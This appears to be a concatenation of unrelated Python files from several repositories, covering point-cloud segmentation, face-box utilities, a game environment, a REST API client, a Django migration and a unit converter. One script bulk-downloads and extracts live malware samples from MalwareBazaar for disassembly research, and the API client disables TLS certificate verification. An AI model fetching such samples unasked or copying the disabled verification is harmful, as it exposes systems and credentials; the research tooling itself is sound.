import * from models import model parser = argparse.ArgumentParser() parser.add_argument('--gpu', type=str, default="1", help='GPU to use [default: GPU 1]') parser.add_argument('--verbose', action='store_true', help='if specified, use depthconv') parser.add_argument('--input_list', type=str, default='/media/hdd2/data/pointnet/stanfordindoor/valid_hdf5_file_list.txt', help='Validation data list') parser.add_argument('--restore_dir', type=str, default='checkpoint/stanford_ins_seg_groupmask11_fromgroup_recipweight_nopow2_lr4', help='Directory that stores all training logs and trained models') FLAGS = parser.parse_args() PRETRAINED_MODEL_PATH = os.path.join(FLAGS.restore_dir,'trained_models/') gpu_to_use = 0 os.environ["CUDA_VISIBLE_DEVICES"] = FLAGS.gpu RESTORE_DIR = FLAGS.restore_dir OUTPUT_DIR = os.path.join(FLAGS.restore_dir, 'valid_results') if not os.path.exists(OUTPUT_DIR): os.mkdir(OUTPUT_DIR) OUTPUT_VERBOSE = FLAGS.verbose # If true, output similarity # MAIN SCRIPT POINT_NUM = 4096 # the max number of points in the all testing data shapes BATCH_SIZE = 1 NUM_GROUPS = 50 NUM_CATEGORY = 13 TESTING_FILE_LISTFILE = FLAGS.input_list test_file_list = provider.getDataFiles(TESTING_FILE_LISTFILE) len_pts_files = len(test_file_list) def printout(flog, data): print(data) flog.write(data + '\n') def predict(): is_training = False with tf.device('/gpu:' + str(gpu_to_use)): is_training_ph = tf.placeholder(tf.bool, shape=()) pointclouds_ph, ptsseglabel_ph, ptsgroup_label_ph, _, _, _ = \ model.placeholder_inputs(BATCH_SIZE, POINT_NUM, NUM_GROUPS, NUM_CATEGORY) group_mat_label = tf.matmul(ptsgroup_label_ph, tf.transpose(ptsgroup_label_ph, perm=[0, 2, 1])) net_output = model.get_model(pointclouds_ph, is_training_ph, group_cate_num=NUM_CATEGORY) # Add ops to save and restore all the variables. saver = tf.train.Saver() config = tf.ConfigProto() config.gpu_options.allow_growth = True config.allow_soft_placement = True with tf.Session(config=config) as sess: # Restore variables from disk. ckptstate = tf.train.get_checkpoint_state(PRETRAINED_MODEL_PATH) if ckptstate is not None: LOAD_MODEL_FILE = os.path.join(PRETRAINED_MODEL_PATH,os.path.basename(ckptstate.model_checkpoint_path)) saver.restore(sess, LOAD_MODEL_FILE) print ("Model loaded in file: %s" % LOAD_MODEL_FILE) else: print ("Fail to load modelfile: %s" % PRETRAINED_MODEL_PATH) ths = np.zeros(NUM_CATEGORY) ths_ = np.zeros(NUM_CATEGORY) cnt = np.zeros(NUM_CATEGORY) min_groupsize = np.zeros(NUM_CATEGORY) min_groupsize_cnt = np.zeros(NUM_CATEGORY) for shape_idx in range(len_pts_files): cur_train_filename = test_file_list[shape_idx] if not os.path.exists(cur_train_filename): continue cur_data, cur_group, _, cur_seg = provider.loadDataFile_with_groupseglabel_stanfordindoor(cur_train_filename) if OUTPUT_VERBOSE: pts = np.reshape(cur_data, [-1,9]) output_point_cloud_rgb(pts[:, 6:], pts[:, 3:6], os.path.join(OUTPUT_DIR, '%d_pts.obj' % (shape_idx))) pts_label_one_hot, pts_label_mask = model.convert_seg_to_one_hot(cur_seg) pts_group_label, _ = model.convert_groupandcate_to_one_hot(cur_group) num_data = cur_data.shape[0] cur_seg_flatten = np.reshape(cur_seg, [-1]) un, indices = np.unique(cur_group, return_index=True) for iu, u in enumerate(un): groupsize = np.sum(cur_group == u) groupcate = cur_seg_flatten[indices[iu]] min_groupsize[groupcate] += groupsize # print groupsize, min_groupsize[groupcate]/min_groupsize_cnt[groupcate] min_groupsize_cnt[groupcate] += 1 for j in range(num_data): print ("Processsing: Shape [%d] Block[%d]"%(shape_idx, j)) pts = cur_data[j,...] feed_dict = { pointclouds_ph: np.expand_dims(pts,0), ptsseglabel_ph: np.expand_dims(pts_label_one_hot[j,...],0), ptsgroup_label_ph: np.expand_dims(pts_group_label[j,...],0), is_training_ph: is_training, } pts_corr_val0, pred_confidence_val0, ptsclassification_val0, pts_corr_label_val0 = \ sess.run([net_output['simmat'], net_output['conf'], net_output['semseg'], group_mat_label], feed_dict=feed_dict) seg = cur_seg[j,...] ins = cur_group[j,...] pts_corr_val = np.squeeze(pts_corr_val0[0]) pred_confidence_val = np.squeeze(pred_confidence_val0[0]) ptsclassification_val = np.argmax(np.squeeze(ptsclassification_val0[0]),axis=1) pts_corr_label_val = np.squeeze(1 - pts_corr_label_val0) seg = np.squeeze(seg) ins = np.squeeze(ins) ind = (seg == 8) pts_corr_val0 = (pts_corr_val > 1.).astype(np.float) print np.mean(np.transpose(np.abs(pts_corr_label_val[ind] - pts_corr_val0[ind]),axes=[1,0])[ind]) ths, ths_, cnt = Get_Ths(pts_corr_val, seg, ins, ths, ths_, cnt) print ths/cnt if OUTPUT_VERBOSE: un,indices = np.unique(ins,return_index=True) for ii,id in enumerate(indices): corr = pts_corr_val[id].copy() output_scale_point_cloud(pts[:,6:], np.float32(corr), os.path.join(OUTPUT_DIR, '%d_%d_%d_%d_scale.obj'%(shape_idx,j,un[ii],seg[id]))) corr = pts_corr_label_val[id] output_scale_point_cloud(pts[:, 6:], np.float32(corr), os.path.join(OUTPUT_DIR, '%d_%d_%d_%d_scalegt.obj' % (shape_idx, j, un[ii],seg[id]))) output_scale_point_cloud(pts[:, 6:], np.float32(pred_confidence_val), os.path.join(OUTPUT_DIR, '%d_%d_conf.obj' % (shape_idx, j))) output_color_point_cloud(pts[:,6:], ptsclassification_val.astype(np.int32), os.path.join(OUTPUT_DIR, '%d_seg.obj'%(shape_idx))) ths = [ths[i]/cnt[i] if cnt[i] != 0 else 0.2 for i in range(len(cnt))] np.savetxt(os.path.join(RESTORE_DIR, 'pergroup_thres.txt'), ths) min_groupsize = [int(float(min_groupsize[i]) / min_groupsize_cnt[i]) if min_groupsize_cnt[i] != 0 else 0 for i in range(len(min_groupsize))] np.savetxt(os.path.join(RESTORE_DIR, 'mingroupsize.txt'), min_groupsize) with tf.Graph().as_default(): predict() utils.py import dlib import numpy as np def orthogonal_projections(matrix, u, vh): return np.diag(u.T @ matrix @ vh.T) def svd(image): u, s, vh = np.linalg.svd(image, full_matrices=True) return {'u': u, 's': s, 'vh': vh} def crop(image, x, y, w, h): return image[y:y + h, x:x + w] # def crop_dlib(image, x, y, w, h): # left = x # top = y # right = x + w # bottom = y + h # rect = dlib.rectangle(left, top, right, bottom) # return dlib.get_face_chip(image, rect) def _face_id_generator_func(): face_id = 1 while True: yield f"{face_id}" face_id += 1 def _tmp_face_id_generator_func(): face_id = 1 while True: yield f"tmp:{face_id}" face_id += 1 _face_id_generator = _face_id_generator_func() _tmp_face_id_generator = _tmp_face_id_generator_func() def generate_tmp_face_id(): return next(_tmp_face_id_generator) def generate_face_id(): return next(_face_id_generator) def is_tmp_id(face_id): return face_id.split(':')[0] == "tmp" def box_area(box): return box[2] * box[3] def bb_intersection_over_union(boxA, boxB): # determine the (x, y)-coordinates of the intersection rectangle xA = max(boxA[0], boxB[0]) yA = max(boxA[1], boxB[1]) xB = min(boxA[0] + boxA[2], boxB[0] + boxB[2]) yB = min(boxA[1] + boxA[3], boxB[1] + boxB[3]) # compute the area of intersection rectangle interArea = max(0, xB - xA + 1) * max(0, yB - yA + 1) # compute the area of both the prediction and ground-truth # rectangles boxAArea = (boxA[2] + 1) * (boxA[3] + 1) boxBArea = (boxB[2] + 1) * (boxB[3] + 1) # compute the intersection over union by taking the intersection # area and dividing it by the sum of prediction + ground-truth # areas - the interesection area iou = interArea / float(boxAArea + boxBArea - interArea) # return the intersection over union value return iou def match_box(face_box, face_boxes, threshold=0.3): if not face_boxes: return False, 0 max_iou = 0 best_face_id = -1 for _face_id, _face_box in enumerate(face_boxes): iou = bb_intersection_over_union(face_box, _face_box) if iou > max_iou: max_iou = iou best_face_id = _face_id matched_ok = max_iou >= threshold return matched_ok, best_face_id def to_int_cords(face_box): return tuple([int(cord) for cord in face_box]) def euc_dist(vec1, vec2, p=2, weights=1): return np.linalg.norm(weights*(vec1 - vec2), p) def cos_dist(vec1, vec2): return np.dot(vec1, vec2)/(np.linalg.norm(vec1) * np.linalg.norm(vec2)) KivenCkl/LeetCodeProblemset/shuffle-an-array/shuffle-an-array.py1-10 # @Title: 打乱数组 (Shuffle an Array) # @Author: KivenC # @Date: 2019-03-13 11:54:48 # @Runtime: 732 ms # @Memory: 19.2 MB class Solution: def __init__(self, nums: List[int]): self.nums = nums def reset(self) -> List[int]: """ Resets the array to its original configuration and return it. """ return self.nums def shuffle(self) -> List[int]: """ Returns a random shuffling of the array. """ import random return random.sample(self.nums, len(self.nums)) # Your Solution object will be instantiated and called as such: # obj = Solution(nums) # param_1 = obj.reset() # param_2 = obj.shuffle() simpleland/env.py from simpleland.registry import load_game_content, GameDef import gym from gym import spaces import logging from simpleland.runner import get_game_def, get_player_def, UDPHandler, GameUDPServer from simpleland.event import InputEvent import threading from simpleland.player import Player from simpleland.renderer import Renderer from simpleland.utils import gen_id from simpleland.core import gamectx from simpleland.client import GameClient from simpleland.registry import load_game_def, load_game_content import time from typing import Dict, Any # AGENT_KEYMAP = [0,17,5,23,19,1,4] import numpy as np from simpleland.utils import merged_dict from pyinstrument import Profiler keymap = [23,1,4] class SimpleLandEnv: def __init__(self, resolution=(200,200), game_id="space_ship1", hostname = 'localhost', port = 10001, dry_run=False, agent_map={}, physics_tick_rate = 0, game_tick_rate = 0, sim_timestep = 0.01, enable_server = True, view_type=0, render_shapes=True, player_type = 1, content_config = {}): game_def = get_game_def( game_id=game_id, enable_server=enable_server, port=port, remote_client=False, physics_tick_rate=physics_tick_rate, game_tick_rate = game_tick_rate, sim_timestep=sim_timestep) game_def.content_config = merged_dict(game_def.content_config,content_config) self.content = load_game_content(game_def) gamectx.initialize( game_def = game_def, content=self.content) # Build Clients self.agent_map = agent_map self.agent_clients = {} player_def = None for agent_id, agent_info in agent_map.items(): player_def = get_player_def( enable_client=True, client_id = agent_id, remote_client=False, hostname=hostname, port = port, resolution = resolution,#agent_info['resolution'], fps=game_tick_rate, render_shapes=render_shapes, player_type=player_type, is_human=False, view_type=view_type) # Render config changes player_def.renderer_config.sdl_audio_driver = 'dsp' player_def.renderer_config.render_to_screen = True # self.config_manager.renderer_config.sdl_video_driver = 'dummy' player_def.renderer_config.sound_enabled = False player_def.renderer_config.show_console = False renderer = Renderer( player_def.renderer_config, asset_bundle=self.content.get_asset_bundle() ) client = GameClient( renderer=renderer, config=player_def.client_config) gamectx.add_local_client(client) self.agent_clients[agent_id]=client self.dry_run = dry_run self.action_space = spaces.Discrete(len(keymap)) # self.observation_space = spaces.Box(0, 255, (resolution[0], resolution[1],3)) self.observation_space = self.content.get_observation_space() logging.info("Ob space: {}".format(self.observation_space)) self.action_freq = 1 self.step_counter = 0 self.ob = None self.safe_mode = True self.running = True self.server=None self.dry_run_sample = self.observation_space.sample() if game_def.server_config.enabled: self.server = GameUDPServer( conn = (game_def.server_config.hostname, game_def.server_config.port), handler=UDPHandler, config = game_def.server_config) server_thread = threading.Thread(target=self.server.serve_forever) server_thread.daemon = True server_thread.start() print("Server started at {} port {}".format(game_def.server_config.hostname, game_def.server_config.port)) def step(self, actions): # get actions from agents if self.step_counter % self.action_freq == 0: for agent_id, action in actions.items(): client:GameClient = self.agent_clients[agent_id] if self.dry_run: return self.dry_run_sample, 1, False, None if client.player is not None: event = InputEvent( player_id = client.player.get_id(), input_data = { 'inputs':[keymap[action]], 'mouse_pos': "", 'mouse_rel': "", 'focused': "" }) client.player.add_event(event) client.run_step() gamectx.run_step() obs = {} dones = {} rewards = {} infos ={} if self.step_counter % self.action_freq ==0: for agent_id,client in self.agent_clients.items(): # ob = client.get_observation(type="sensor") ob, reward, done, info = client.content.get_step_info(player= client.player) obs[agent_id] = ob dones[agent_id] = done rewards[agent_id] = reward infos[agent_id] = info self.step_counter +=1 return obs,rewards,dones,infos def render(self, mode=None): if self.dry_run: return self.observation_space.sample() # TODO: add rendering for observer window for agent_id,client in self.agent_clients.items(): client.render(force=True) return client.get_rgb_array() def reset(self) -> Dict[str,Any]: # self.content.load(gamectx) self.obs, _, _, _ = self.step({}) return self.obs def close(self): if self.server is not None: self.server.shutdown() self.server.server_close() class SimpleLandEnvSingle(gym.Env): def __init__(self, frame_skip=0, content_config={}, render_shapes=True, player_type=1, view_type=1, game_tick_rate=10000): print("Starting SL v21") self.agent_id = "1" self.env_main = SimpleLandEnv( agent_map={self.agent_id:{}}, enable_server=False, game_tick_rate=game_tick_rate, content_config=content_config, view_type=view_type, player_type=player_type, render_shapes=render_shapes) self.observation_space = self.env_main.observation_space self.action_space = self.env_main.action_space self.frame_skip = frame_skip def reset(self): obs = self.env_main.reset() return obs.get(self.agent_id) def step(self,action): total_reward = 0 ob = None done = False info = {} i = 0 reward_list = [] ready = False while not ready: obs,rewards,dones,infos = self.env_main.step({self.agent_id:action}) ob, reward, done, info = obs[self.agent_id],rewards[self.agent_id],dones[self.agent_id],infos[self.agent_id] # TODO: check for obs mode render use image as obs space total_reward +=reward reward_list.append(reward) if done: ready = True # if done found, exit loop elif ob is None: # if ob is missing, retry time.sleep(0.01) continue elif i >= self.frame_skip: # if frames skipped reached, exit loop ready = True i +=1 return ob, max(reward_list), done, info def close(self): self.env_main.close() def render(self,mode=None): return self.env_main.render(mode=mode) if __name__ == "__main__": agent_map = {str(i):{} for i in range(1)} env = SimpleLandEnv(agent_map=agent_map,dry_run=False) env.reset() done_agents = set() start_time = time.time() max_steps = 100000 profiler = Profiler() profiler.start() for i in range(0,max_steps): actions = {agent_id:env.action_space.sample() for agent_id in agent_map.keys()} obs, rewards, dones, infos = env.step(actions) steps_per_sec = max_steps/(time.time()-start_time) print(f"steps_per_sec {steps_per_sec}") profiler.stop() print(profiler.output_text(unicode=True, color=True)) 1-10 # # Common HTTP methods # import requests import json from .exceptions import EdmApiClientError, EdmApiServerError PREFIX = '/api/' HTTPS = 'https://' ERR_STR = 'EDM API Call failed with status {status_code}: {body}' class Rest(object): """ Class with methods to make the api calls """ def __init__(self, host, apitoken, api_version, raise_on_error=False): self.host = host self.apitoken = apitoken self.apiversion = api_version self.raise_on_error = raise_on_error self._headers = { 'X-Arbux-APIToken': self.apitoken, } @staticmethod def _format_response(response): """ Return a dict containing body, status code and headers of the response """ # If content is not json then it is # probably an error. So return try: # Decoding from UTF-8 is necessary for Python versions below 3.6 # https://docs.python.org/3/whatsnew/3.6.html#json body = json.loads(response.content if type(response.content) == str else response.content.decode('utf-8')) except ValueError: body = {'error': response.reason} formated = { 'body': body, 'status_code': response.status_code, 'headers': response.headers } return formated @staticmethod def _raise_on_error(response): """ Raise an exception if the response contains an unsuccessful status code """ if 400 <= response['status_code'] < 500: raise EdmApiClientError(ERR_STR.format( status_code=response['status_code'], body=response['body'])) elif 500 <= response['status_code'] < 600: raise EdmApiServerError(ERR_STR.format( status_code=response['status_code'], body=response['body'])) def _make_request(self, rest_method, item=None, **kwargs): """ Make requests """ s = requests.Session() url = HTTPS + self.host + PREFIX + self.apiversion \ + self.base_url url = url + (item if item else '') req = requests.Request(rest_method, url, headers=self._headers, **kwargs) prepped = s.prepare_request(req) if rest_method in ['POST', 'PUT', 'PATCH']: prepped.headers['Content-Type'] = 'application/json' response = self._format_response(s.send(prepped, verify=False)) if self.raise_on_error: self._raise_on_error(response) return response def _post(self, **kwargs): """ REST POST method """ return self._make_request('POST', data=json.dumps(kwargs)) def _get(self, **kwargs): """ REST GET method """ item = '/' + str(kwargs.pop('item')) if 'item' in kwargs and \ kwargs['item'] else '' return self._make_request('GET', item=item, params=kwargs) def _delete(self, item=None): """ REST DELETE method """ item = '/' + str(item) if item else '' return self._make_request('DELETE', item=item) def _patch(self, item=None, **kwargs): """ REST PATCH method """ item = '/' + str(item) if item else '' return self._make_request('PATCH', item=item, data=json.dumps(kwargs)) def _put(self, item=None, **kwargs): """ REST PUT method """ item = '/' + str(item) if item else '' return self._make_request('PUT', item=item, data=json.dumps(kwargs)) L1NNA/JARV1S-Disassembler from pathlib import Path import os import requests from lxml import html from tqdm import tqdm import urllib.request as ur from zipfile import ZipFile from jvd.utils import grep_ext, download_file from jvd.ida.ida import IDA import sys import io from csv import reader as csv_reader from jvd.resources import ResourceAbstract from jvd import process_folder from jvd.utils import download_file, JVSample, read_gz_js, write_gz_js from shutil import rmtree from jvd.labelers import label files = "https://mb-api.abuse.ch/downloads/" url_csv = 'https://bazaar.abuse.ch/export/csv/full/' def _download_all(data_path): cache = os.path.join(data_path, 'progress.json.gz') if not os.path.exists(cache): write_gz_js({'done': []}, cache) done = set(read_gz_js(cache)['done']) page = requests.get(files) webpage = html.fromstring(page.content) links = webpage.xpath('//a/@href') links = [(os.path.join(data_path, l), files+l, l) for l in links if l.startswith(('2020', '2021'))] for l in tqdm(links): try: # _process_entry(l, data_path, done) file, link, name = l print() print('processing', file, name) if not os.path.exists(file): download_file(link, file, True) ext = str(Path(file).with_suffix('')) + '_extracted' ext = os.path.abspath(ext) if not os.path.exists(ext) and os.path.basename(ext) not in done: with ZipFile(file) as zf: zf.extractall(ext, pwd=b'infected') process_folder(ext, capa=True, unpack=True, disassemble=False) _merge_all(data_path) done.add(os.path.basename(ext)) write_gz_js({'done': list(done)}, cache) except Exception as e: print(e) print(l) continue _merge_all(data_path) def _merge_all(path, out_dir='_all_staging'): folders = [os.path.join(path, p) for p in os.listdir(path)] folders = [f for f in folders if os.path.isdir( f) and not os.path.basename(f).startswith('_all')] print(folders) for f in tqdm(folders): bins = Path(f).rglob('*.bin') for b in tqdm(bins): b: Path sample = JVSample(str(b)) # label(sample) # continue family = '-'.join( sorted([l for l in sample.labels if not l.startswith('_vt')])) if family == 'na': dest = os.path.join(path, out_dir, 'unknown') else: dest = os.path.join(path, out_dir, sample.file_type.split()[0].lower(), sample.file_type.split()[0].lower() + '.' + family) if not os.path.exists(dest): os.makedirs(dest) target = os.path.join(dest, b.name) if not os.path.exists(target): os.rename(str(b), target) if __name__ == '__main__': data_path = 'I:/MalBinZoo/ftp' # _download_all(data_path) _merge_all(data_path) pass # label_folder('I:/MalBinZoo/2020-06-29_extracted') food_toolbox/migrations/0001_initial.py # -*- coding: utf-8 -*- # Generated by Django 1.10.6 on 2017-03-28 15:39 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Ingredients_List', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=100)), ], ), migrations.CreateModel( name='Recipe', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title_text', models.CharField(max_length=200)), ('last_modified_date', models.DateField(verbose_name=b'last modified')), ('process_description', models.TextField()), ('cooking_temperature_celsius', models.IntegerField(blank=True)), ('preparation_time_minutes', models.IntegerField(blank=True)), ('presentation_image_link', models.URLField(blank=True, null=True)), ], ), migrations.CreateModel( name='Recipe_Ingredient', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('ingredient_quantity', models.CharField(blank=True, max_length=100, null=True)), ('ingredient_name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='food_toolbox.Ingredients_List')), ('recipe', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='food_toolbox.Recipe')), ], ), ] fperez/regregcode/tests/test_graphroot.py import numpy as np import pylab, time, scipy import scipy.sparse import regreg.regression as regreg import regreg.lasso as lasso import regreg.graphroot as graphroot import regreg.signal_approximator as glasso from tests import gen_adj from regreg import mask import nose.tools control = {'max_its':5500, 'tol':1.0e-8, 'plot':False, 'backtrack':True} def test_graphroot(X=None,Y=None,l1=5.,l2=10., control=control, mu=1.): if X is None or Y is None: X = np.load('X.npy') Y = np.load('Y.npy') p = X.shape[1] adj, L = gen_adj(p) Dsparse = mask.create_D(adj) D = Dsparse.toarray() Lsparse = scipy.sparse.lil_matrix(L) l1 *= X.shape[0] p1 = graphroot.gengrad((X, Y, D)) p1.assign_penalty(l1=l1,l2=l2,mu=mu) t1 = time.time() opt1 = regreg.FISTA(p1) opt1.fit(tol=control['tol'], max_its=control['max_its']) beta1 = opt1.problem.coefs t2 = time.time() ts1 = t2-t1 p2 = graphroot.gengrad_sparse((X, Y, Dsparse)) p2.assign_penalty(l1=l1,l2=l2,mu=mu) t1 = time.time() opt2 = regreg.FISTA(p2) opt2.fit(tol=control['tol'], max_its=control['max_its']) beta2 = opt2.problem.coefs t2 = time.time() ts2 = t2-t1 def f(beta): return np.linalg.norm(Y - np.dot(X, beta))**2/(2) + np.fabs(beta).sum()*l1 + l2 * np.sqrt(np.dot(beta, np.dot(L, beta))) v = scipy.optimize.fmin_powell(f, np.zeros(X.shape[1]), ftol=1.0e-10, xtol=1.0e-10,maxfun=100000) v = np.asarray(v) vs = scipy.optimize.fmin_powell(p1.obj, np.zeros(X.shape[1]), ftol=1.0e-10, xtol=1.0e-10,maxfun=100000) vs = np.asarray(vs) print np.round(1000*beta1)/1000 print np.round(1000*beta2)/1000 print np.round(1000*vs)/1000 print np.round(1000*v)/1000 print p1.obj(beta1), p1.obj(vs), f(beta1), f(v) print ts1, ts2 NOAA-ORR-ERD/PyNUCOS #!/usr/bin/env python # -*- coding: utf-8 -*- """ Unit conversion calculators. CHANGELOG: 2005/07/14 CB: Initial import. 2005/07/15 MO: Latitude and Longitude classes. 2005/07/18 MO: Limit Latitude range to 90. 2007/05/03 CB: Tweaked lat-long to get correct answer for 40 minutes. Added "convert" as alias for "Convert" 2007/12/17 MO: Add .format() method to Latitude/Longitude returning Unicode. .factor_html() remains for backward compatibility, using .format() internally. Make Latitude/Longitude.__repr__ more robust in case .__init__ raises an exception; workaround for Pylons bug http://pylonshq.com/project/pylonshq/ticket/341 2008/02/22 CB: Added a few more units for Ian 2008/06/05 CB: Various changes before putting the Converter GUI on the web: new units, changed spelling, etc. 2009/09/29 CB: Re-factored the lat-long stuff: - it's not in a separate module - Mike and Chris' code has been merged for less duplication - Unit data moved to separate module 2018/01/24 CB: Added unicode exponents in unit names Added __all__ Fixed concentration in water units! """ import warnings from .unit_data import ConvertDataUnits from nucos import lat_long from .lat_long import (LatLongConverter, Latitude, Longitude, format_lat, format_lon, format_lat_d, format_lon_d, format_lat_dm, format_lon_dm, format_lat_dms, format_lon_dms, ) __all__ = ['DensityConverterClass', 'InvalidUnitTypeError', 'Latitude', 'ConverterClass', 'is_supported', 'Converters', 'GetUnitNames', 'NotSupportedUnitError', 'UNIT_TYPES', 'TempConverterClass', 'Simplify', 'GetUnitAbbreviation', 'Convert', 'FindUnitTypes', 'lat_long', 'LatLongConverter', 'Longitude', 'ConvertDataUnits', 'InvalidUnitError', 'is_same_unit', 'GetUnitTypes', 'OilQuantityConverter', 'convert', 'UnitConversionError', 'format_lat', 'format_lon', 'format_lat_dms', 'format_lon_dms', ] # A few utilities def Simplify(string): """ Simplify(string) returns the string with the whitespace and capitalization removed """ try: return "".join(string.lower().split()).replace(".", "") except AttributeError: raise NotSupportedUnitError(string) def GetUnitTypes(): """ returns a list of all the unit types available a unit type is something like "mass", "velocity", etc. """ return list(ConvertDataUnits.keys()) def GetUnitNames(UnitType): """ returns a list of all the units available for a given unit type available a unit type is something like "Mass", "Velocity", etc. a unit of mass would be "kilogram", "slug", etc. """ UnitType.capitalize() return list(ConvertDataUnits[UnitType].keys()) def FindUnitTypes(): """ returns a mapping of all the unit names to the unit types raises an exception if there is more than one option -- this will check the unit database for duplicated names Usually not called from user code. """ unit_types = {} for unit_type, unit_data in ConvertDataUnits.items(): unit_type = Simplify(unit_type) # - skipping Oil Concentration, 'cause this is really length # - lots of duplicate units! # - skipping Concentration in water, 'cause it's weird # - mass/volume and mass/mass ! # - skipping Mass Fraction, because there are lots of duplicate units # that conflict with Concentration & Concentration In Water. if unit_type in ('oilconcentration', 'concentrationinwater', 'massfraction', 'volumefraction', 'deltatemperature', 'dimensionless', ): continue for pname, data in unit_data.items(): # strip out whitespace and capitalization pname = Simplify(pname) # add the primary name: unit_types[pname] = unit_type # now the synonyms: for n in data[1]: n = Simplify(n) # skip duplicate units, "oz" is only mass, "s" is only time if (unit_type, n) in [("volume", "oz"), ("density", "s")]: continue if n in unit_types: raise ValueError("Duplicate name in units table: %s" % n) unit_types[n] = unit_type return unit_types UNIT_TYPES = FindUnitTypes() def GetUnitAbbreviation(unit_type, unit): """ return the standard abbreviation for a given unit :param unit_type: the type of unit: "mass", "length", etc. :param unit: the unit you want the abbreviation for: "gram", etc. """ return ConvertDataUnits[unit_type][unit][1][0] def is_same_unit(unit1, unit2): """ Checks if the two unit names passed in are the same :param unit1: name of unit to compare :type unit1: string :param unit2: name of unit to compare :type unit2: string :returns: True if they are synonyms for the same unit. False if they are different units. False if one of them is not in the database. """ all_types = UNIT_TYPES unit1 = Simplify(unit1) unit2 = Simplify(unit2) try: type1 = all_types[unit1] type2 = all_types[unit2] except KeyError: return False if type1 != type2: return False else: Synonyms = Converters[Simplify(type1)].Synonyms return Synonyms[Simplify(unit1)] == Synonyms[Simplify(unit2)] class ConverterClass: """ Main class for performing the conversion. There will be one instance for each unit type. sub-classes will handle special cases """ def __init__(self, TypeName, UnitsDict): """ Create a Converter :param TypeName: the name of the unit type, such as "length" :param UnitsDict: A dict will the unit data. See unit_data.py for format """ self.Name = TypeName self.Synonyms = {} self.Convertdata = {} for PrimaryName, data in UnitsDict.items(): # strip out whitespace and capitalization Pname = Simplify(PrimaryName) self.Convertdata[Pname] = data[0] self.Synonyms[Pname] = Pname for synonym in data[1]: # duplicate check if synonym in self.Synonyms: raise ValueError("Duplicate synonym: " "unit_type: {}, name: {}".format(TypeName, synonym) ) self.Synonyms[Simplify(synonym)] = Pname def Convert(self, FromUnit, ToUnit, Value): """ Convert(FromUnit, ToUnit, Value) returns a new value, in the units of ToUnit. :param FromUnit: the unit the original value is in :param ToUnit: the unit you want the value converted to :param Value: the original value """ FromUnit = Simplify(FromUnit) ToUnit = Simplify(ToUnit) try: FromUnit = self.Synonyms[FromUnit] except KeyError: raise InvalidUnitError((FromUnit, self.Name)) try: ToUnit = self.Synonyms[ToUnit] except KeyError: raise InvalidUnitError((ToUnit, self.Name)) return Value * self.Convertdata[FromUnit] / self.Convertdata[ToUnit] # the special case classes: class TempConverterClass(ConverterClass): """ Special case class for temperature conversion. handles the zero-offset shift for K, C, F... """ def Convert(self, FromUnit, ToUnit, Value): """ Convert(FromUnit, ToUnit, Value) returns a new value, in the units of ToUnit. :param FromUnit: the unit the original value is in :param ToUnit: the unit you want the value converted to :param Value: the original value """ FromUnit = Simplify(FromUnit) ToUnit = Simplify(ToUnit) try: FromUnit = self.Synonyms[FromUnit] except KeyError: raise InvalidUnitError((FromUnit, self.Name)) try: ToUnit = self.Synonyms[ToUnit] except KeyError: raise InvalidUnitError((ToUnit, self.Name)) A1 = self.Convertdata[FromUnit][0] B1 = self.Convertdata[FromUnit][1] A2 = self.Convertdata[ToUnit][0] B2 = self.Convertdata[ToUnit][1] to_val = ((Value + B1) * A1 / A2) - B2 return to_val class DensityConverterClass(ConverterClass): """ Special case class for Density conversion. handles the special case of API gravity, etc. """ def Convert(self, FromUnit, ToUnit, Value): """ Convert(FromUnit, ToUnit, Value) returns a new value, in the units of ToUnit. :param FromUnit: the unit the original value is in :param ToUnit: the unit you want the value converted to :param Value: the original value """ FromUnit = Simplify(FromUnit) ToUnit = Simplify(ToUnit) try: FromUnit = self.Synonyms[FromUnit] except KeyError: raise InvalidUnitError((FromUnit, self.Name)) try: ToUnit = self.Synonyms[ToUnit] except KeyError: raise InvalidUnitError((ToUnit, self.Name)) if FromUnit == "apidegree": # another Special case (could I do this the same as temp?) Value = 141.5 / (Value + 131.5) FromUnit = u"specificgravity(15\xb0c)" if ToUnit == "apidegree": ToVal = (141.5 / (Value * self.Convertdata[FromUnit] / self.Convertdata[u"specificgravity(15\xb0c)"]) - 131.5) else: ToVal = (Value * self.Convertdata[FromUnit] / self.Convertdata[ToUnit]) return ToVal class OilQuantityConverter: """ class for Oil Quantity conversion -- mass to/from Volume requires density info as well """ @classmethod def ToVolume(self, Mass, MassUnits, Density, DensityUnits, VolumeUnits): """ Convert Oil Mass to Volume :param Mass: mass you want converted to volume :param MassUnits: unit of mass input :param Density: density of oil :param DensityUnits: units of density :param VolumeUnits: units of volume desired """ Density = convert("Density", DensityUnits, "kg/m^3", Density) Mass = convert("Mass", MassUnits, "kg", Mass) Volume = Mass / Density Volume = convert("Volume", "m^3", VolumeUnits, Volume) return Volume @classmethod def ToMass(self, Volume, VolUnits, Density, DensityUnits, MassUnits): """ Convert Oil Mass to Volume :param Volume: volume you want converted to mass :param VolumeUnits: units of volume input :param Density: density of oil :param DensityUnits: units of density :param MassUnits: unit of mass desired for output """ Density = convert("Density", DensityUnits, "kg/m^3", Density) Volume = convert("Volume", VolUnits, "m^3", Volume) Mass = Volume * Density Mass = convert("Mass", "kg", MassUnits, Mass) return Mass # create the converter objects Converters = {} for (unittype, data) in ConvertDataUnits.items(): if unittype.lower() == 'temperature': Converters["temperature"] = TempConverterClass(unittype, data) elif unittype.lower() == 'density': Converters["density"] = DensityConverterClass(unittype, data) else: Converters[Simplify(unittype)] = ConverterClass(unittype, data) def is_supported(unit): """ Returns True is the unit is in the list of supported units for the API that does not require unit_type """ return Simplify(unit) in UNIT_TYPES def convert(unit1, unit2, value, unit_type=None): """ convert(unit1, unit2, value, unit_type) :param unit1: the unit the original value is in :param unit2: the unit you want the value converted to :param value: the original value If unit_type is None, then it will look in the data to see if it can figure out what unit type to use. so you should be able to do: convert(unit1='meter', unit2='feet', value=32) NOTE: Some odd units have overlapping names, so only the more common one is used (oz is mass, not fluid oz, for instance). You can get around this by using a more precise name ('fluid oz') or specify the unit type. If you do want to specify the unit type, you can use the "old" API: convert(unit_type, unit1, unit2, 